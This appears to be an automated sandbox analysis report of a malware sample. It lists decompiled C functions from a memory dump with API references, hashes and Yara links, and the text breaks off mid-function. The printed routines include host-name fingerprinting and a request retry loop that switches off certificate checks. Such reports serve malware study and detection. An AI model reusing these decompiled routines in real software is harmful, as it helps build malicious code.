                                                                                                                          0x04cd151b
                                                                                                                          0x04cd151e
                                                                                                                          0x04cd1527
                                                                                                                          0x04cd152c
                                                                                                                          0x04cd152c
                                                                                                                          0x04cd1531
                                                                                                                          0x04cd1536
                                                                                                                          0x04cd1536
                                                                                                                          0x04cd1531
                                                                                                                          0x04cd14bb
                                                                                                                          0x04cd1538
                                                                                                                          0x04cd153e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD3DA0: SysAllocString.OLEAUT32(80000002), ref: 04CD3DFD
                                                                                                                            • Part of subcall function 04CD3DA0: SysFreeString.OLEAUT32(00000000), ref: 04CD3E63
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 04CD152C
                                                                                                                          • SysFreeString.OLEAUT32(04CD28D9), ref: 04CD1536
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 986138563-0
                                                                                                                          • Opcode ID: eba46556b3ca42fb98027dc1b19c93940ca1c2774845fc1d1c5dfd49ef9a2328
                                                                                                                          • Instruction ID: 2123cee3138b8956a0f2bd5a1897e1c328c687478ef1726838796b6b05cf6a2e
                                                                                                                          • Opcode Fuzzy Hash: eba46556b3ca42fb98027dc1b19c93940ca1c2774845fc1d1c5dfd49ef9a2328
                                                                                                                          • Instruction Fuzzy Hash: AE317076500119EFCB11DF64CC88C9BBB7AFFC9750B144698F9069B210E635ED51DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD117A, Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04CD1922(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E04CD9371(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E04CD4A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x4cdd270, 0, _t25);
				}
				return _t22;
			}











                                                                                                                          0x04cd117a
                                                                                                                          0x04cd118b
                                                                                                                          0x04cd118f
                                                                                                                          0x04cd11ea
                                                                                                                          0x04cd1191
                                                                                                                          0x04cd1198
                                                                                                                          0x04cd11a0
                                                                                                                          0x04cd11a3
                                                                                                                          0x04cd11a8
                                                                                                                          0x04cd11ac
                                                                                                                          0x04cd11b2
                                                                                                                          0x04cd11ba
                                                                                                                          0x04cd11bd
                                                                                                                          0x04cd11d5
                                                                                                                          0x04cd11d5
                                                                                                                          0x04cd11e0
                                                                                                                          0x04cd11e0
                                                                                                                          0x04cd11f1

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,058B9364), ref: 04CD11B2
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,058B9364), ref: 04CD11E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1500278894-0
                                                                                                                          • Opcode ID: 6070101c27dd6dd101e6a04616aa8e11464d76aafcacf33fd5c63d204e5fe8e7
                                                                                                                          • Instruction ID: 55424b526e38a6d7156670990843c8245b120defb6714c8307fafc7692aa6281
                                                                                                                          • Opcode Fuzzy Hash: 6070101c27dd6dd101e6a04616aa8e11464d76aafcacf33fd5c63d204e5fe8e7
                                                                                                                          • Instruction Fuzzy Hash: C7018F3A210209BBEF216FA5DC44FAF7B7AFF89754F40402AFB409A161DA71EA14D750
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1BBF, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E04CD1BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04CD75F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04CD4AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                          0x04cd1bc4
                                                                                                                          0x04cd1bcf
                                                                                                                          0x04cd1bd1
                                                                                                                          0x04cd1bd7
                                                                                                                          0x04cd1bd9
                                                                                                                          0x04cd1bde
                                                                                                                          0x04cd1be7
                                                                                                                          0x04cd1beb
                                                                                                                          0x04cd1bf4
                                                                                                                          0x04cd1bf8
                                                                                                                          0x04cd1c07
                                                                                                                          0x04cd1bfa
                                                                                                                          0x04cd1bfb
                                                                                                                          0x04cd1c00
                                                                                                                          0x04cd1c00
                                                                                                                          0x04cd1bf8
                                                                                                                          0x04cd1beb
                                                                                                                          0x04cd1c10

                                                                                                                          APIs
                                                                                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04CD4531,73BCF710,00000000,?,?,04CD4531), ref: 04CD1BD7
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04CD4531,04CD4532,?,?,04CD4531), ref: 04CD1BF4
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ComputerHeapName$AllocateFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 187446995-0
                                                                                                                          • Opcode ID: 7389cdf8aa8e51f98399c169bf31d0126e55fbd30f70be88be12b07ec9396033
                                                                                                                          • Instruction ID: cfb7c5e506dca56c6d0d7a24abb8f8f873f3831834573fa1db6c66cea3a4ddc6
                                                                                                                          • Opcode Fuzzy Hash: 7389cdf8aa8e51f98399c169bf31d0126e55fbd30f70be88be12b07ec9396033
                                                                                                                          • Instruction Fuzzy Hash: BBF05E2A604109BEEB11D6AA8D40FAF7BFEDBC5655F19006AEB05D7140EA70EF029770
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD18D8, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x4cdd274) == 0) {
						E04CD4450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x4cdd274) == 1) {
						_t10 = E04CD262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                          0x04cd18df
                                                                                                                          0x04cd18e0
                                                                                                                          0x04cd18e3
                                                                                                                          0x04cd1915
                                                                                                                          0x04cd1917
                                                                                                                          0x04cd1917
                                                                                                                          0x04cd18e5
                                                                                                                          0x04cd18e6
                                                                                                                          0x04cd18fb
                                                                                                                          0x04cd1902
                                                                                                                          0x04cd1904
                                                                                                                          0x04cd1904
                                                                                                                          0x04cd1902
                                                                                                                          0x04cd18e6
                                                                                                                          0x04cd191f

                                                                                                                          APIs
                                                                                                                          • InterlockedIncrement.KERNEL32(04CDD274), ref: 04CD18ED
                                                                                                                            • Part of subcall function 04CD262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD2642
                                                                                                                          • InterlockedDecrement.KERNEL32(04CDD274), ref: 04CD190D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3834848776-0
                                                                                                                          • Opcode ID: 447362f0805ecbb04d61ab7aca82a080036f5dbc5f8b531ebe2b7a53271584e0
                                                                                                                          • Instruction ID: b528cbc011a91f01f48e7e5519b02d42b1f749cf99ecd41292085c7096ad52d4
                                                                                                                          • Opcode Fuzzy Hash: 447362f0805ecbb04d61ab7aca82a080036f5dbc5f8b531ebe2b7a53271584e0
                                                                                                                          • Instruction Fuzzy Hash: 96E0DF39340222A79B313E70A80476BAB03AB007A4F084122E781C102DDA10FAC3D691
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1F72, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 32%
                                                                                                                          			E04CD1F72(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6f5ee700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                                          0x04cd1f79
                                                                                                                          0x04cd1f86
                                                                                                                          0x04cd1f88
                                                                                                                          0x04cd1f8b
                                                                                                                          0x04cd1fd0
                                                                                                                          0x04cd1fd8
                                                                                                                          0x04cd1fde
                                                                                                                          0x04cd1fe2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd1f8f
                                                                                                                          0x04cd1f95
                                                                                                                          0x04cd1f9d
                                                                                                                          0x04cd1fce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd1f9f
                                                                                                                          0x04cd1f9f
                                                                                                                          0x04cd1fa9
                                                                                                                          0x04cd1fad
                                                                                                                          0x04cd1fb6
                                                                                                                          0x04cd1fbe
                                                                                                                          0x04cd1fec
                                                                                                                          0x04cd1fc0
                                                                                                                          0x04cd1fc0
                                                                                                                          0x00000000
                                                                                                                          0x04cd1fc0
                                                                                                                          0x04cd1fbe
                                                                                                                          0x04cd1fa9
                                                                                                                          0x04cd1fef
                                                                                                                          0x04cd1ff6
                                                                                                                          0x04cd1ff6
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD1F8F
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,04CD46B9,00000000,?,?), ref: 04CD1FE6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: c2fafa8a9c43ec8c07e2b52e3208d9ca6249022353f5ffcb7fefd3e90c1ffa78
                                                                                                                          • Instruction ID: 5b3a62f908fd064683c27a52261e39c6caa7a400c2220a3633ee77d7d69e0a1c
                                                                                                                          • Opcode Fuzzy Hash: c2fafa8a9c43ec8c07e2b52e3208d9ca6249022353f5ffcb7fefd3e90c1ffa78
                                                                                                                          • Instruction Fuzzy Hash: 5F015275904208FBDF149FD6D848EAEBFBAEB84750F148066E601E2244DB74EB44DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD1E47, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 34%
                                                                                                                          			E04CD1E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4cdd2e0; // 0xbda5a8
				_t4 = _t15 + 0x4cde39c; // 0x58b8944
				_t20 = _t4;
				_t6 = _t15 + 0x4cde124; // 0x650047
				_t17 = E04CD144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04CD25D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                          0x04cd1e51
                                                                                                                          0x04cd1e58
                                                                                                                          0x04cd1e59
                                                                                                                          0x04cd1e5a
                                                                                                                          0x04cd1e5b
                                                                                                                          0x04cd1e61
                                                                                                                          0x04cd1e66
                                                                                                                          0x04cd1e66
                                                                                                                          0x04cd1e70
                                                                                                                          0x04cd1e82
                                                                                                                          0x04cd1e89
                                                                                                                          0x04cd1eb7
                                                                                                                          0x04cd1e8b
                                                                                                                          0x04cd1e8d
                                                                                                                          0x04cd1e92
                                                                                                                          0x04cd1eb4
                                                                                                                          0x04cd1e94
                                                                                                                          0x04cd1e97
                                                                                                                          0x04cd1e9e
                                                                                                                          0x04cd1ea3
                                                                                                                          0x04cd1ea5
                                                                                                                          0x04cd1ea5
                                                                                                                          0x04cd1eaa
                                                                                                                          0x04cd1eaa
                                                                                                                          0x04cd1e92
                                                                                                                          0x04cd1ebe

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD144D: SysFreeString.OLEAUT32(?), ref: 04CD152C
                                                                                                                            • Part of subcall function 04CD25D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04CD474F,004F0053,00000000,?), ref: 04CD25DF
                                                                                                                            • Part of subcall function 04CD25D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04CD474F,004F0053,00000000,?), ref: 04CD2609
                                                                                                                            • Part of subcall function 04CD25D6: memset.NTDLL ref: 04CD261D
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1EAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 397948122-0
                                                                                                                          • Opcode ID: 696a210ec3bc15bd49b139a73b6816b68150bfc531ecd9b39ba6c2a81d80cfeb
                                                                                                                          • Instruction ID: 8066262a39dbe9303c78c3eec322a5212936ebfe25c8cc2166f74f7c891494db
                                                                                                                          • Opcode Fuzzy Hash: 696a210ec3bc15bd49b139a73b6816b68150bfc531ecd9b39ba6c2a81d80cfeb
                                                                                                                          • Instruction Fuzzy Hash: A1015E32900129BBDB119FA9DD08DABBBBAFB45254F044125EA05A71A0EB70EA11D791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,6E37A0D4,00000000), ref: 6E3314AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: cf552e4b66afef2b4d066361ed64c02923e6b11188e67a92507467a9e7060a68
                                                                                                                          • Instruction ID: 73138140f62963347e06a06282698952157d29e249489822e9452f472235796e
                                                                                                                          • Opcode Fuzzy Hash: cf552e4b66afef2b4d066361ed64c02923e6b11188e67a92507467a9e7060a68
                                                                                                                          • Instruction Fuzzy Hash: 10F0E9316049B56BEB415AF69815F9B377CAF82770B31C521AC98DA184CB31D80982F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F5C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(?), ref: 6E2F5C69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction ID: 95a0dd9ea923f1d755e8c6bc88f0e504581320b50beece006e92090b248a883c
                                                                                                                          • Opcode Fuzzy Hash: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction Fuzzy Hash: 7DD0C970008E24DFDF05AF54E8147A43BFCF706306F1004A8E40D83694DB319460CA4C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CDAB16, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CDAB16() {

				E04CDABF6(0x4cdc344, 0x4cdd124); // executed
				goto __eax;
			}



                                                                                                                          0x04cdab28
                                                                                                                          0x04cdab2f

                                                                                                                          APIs
                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 04CDAB28
                                                                                                                            • Part of subcall function 04CDABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04CDAC6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 123106877-0
                                                                                                                          • Opcode ID: 656c7bc4374c9f09022c7a9bed8e03b1accd9087c7f46ce1c7085cd4c3b113e6
                                                                                                                          • Instruction ID: ff9271b879235cd9587f4047cc067c496d19ab6c0c9ff0d114d48d56b46db37a
                                                                                                                          • Opcode Fuzzy Hash: 656c7bc4374c9f09022c7a9bed8e03b1accd9087c7f46ce1c7085cd4c3b113e6
                                                                                                                          • Instruction Fuzzy Hash: 8CB012F535C001BD301812091D13D3B059FC8C8924324802FFB02D4000E843BC431031
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CDAB31, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CDAB31() {

				E04CDABF6(0x4cdc344, 0x4cdd134); // executed
				goto __eax;
			}



                                                                                                                          0x04cdab28
                                                                                                                          0x04cdab2f

                                                                                                                          APIs
                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 04CDAB28
                                                                                                                            • Part of subcall function 04CDABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04CDAC6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 123106877-0
                                                                                                                          • Opcode ID: 98a61ee74ab8d6513920b6cf8b8e8824308da472d4d544cbbc27e75f23f7a2b0
                                                                                                                          • Instruction ID: 0b8cad296d243b2473c5fabf4b113a34b2433180d474780ce5dd2e1c863b59e2
                                                                                                                          • Opcode Fuzzy Hash: 98a61ee74ab8d6513920b6cf8b8e8824308da472d4d544cbbc27e75f23f7a2b0
                                                                                                                          • Instruction Fuzzy Hash: 62B012E535E001BD3014520D1D12D37014FC8C8924324802FFB01C4100E8437C431131
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4AAB, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x4cdd270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                          0x04cd4ab7
                                                                                                                          0x04cd4abd

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: e09d9ac428728181a0db46e6368e10342e8ca55bf5349f0108ba72d6f52397d3
                                                                                                                          • Instruction ID: 3006852a73d42bb3af85ab9a8eac70c7f074e7ad0f9210da2f008a360a4a01d2
                                                                                                                          • Opcode Fuzzy Hash: e09d9ac428728181a0db46e6368e10342e8ca55bf5349f0108ba72d6f52397d3
                                                                                                                          • Instruction Fuzzy Hash: 62B012B9541100BBDE215F50DF04F05BA31F750700F004012B30640074C2355C20FB15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD75F6, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD75F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4cdd270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                          0x04cd7602
                                                                                                                          0x04cd7608

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 5e495a4f9054c0c4375c2829725fa38215ce93c1dab0977327e4f8a66fcd2111
                                                                                                                          • Instruction ID: bf6834d8f81835bcdf5e1196b276838ed73422d9654785e927547c5295c02a83
                                                                                                                          • Opcode Fuzzy Hash: 5e495a4f9054c0c4375c2829725fa38215ce93c1dab0977327e4f8a66fcd2111
                                                                                                                          • Instruction Fuzzy Hash: A2B01279441100BBDF115F10DE08F057B31F750700F014111B20540060C2355C24FB04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4B28, Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
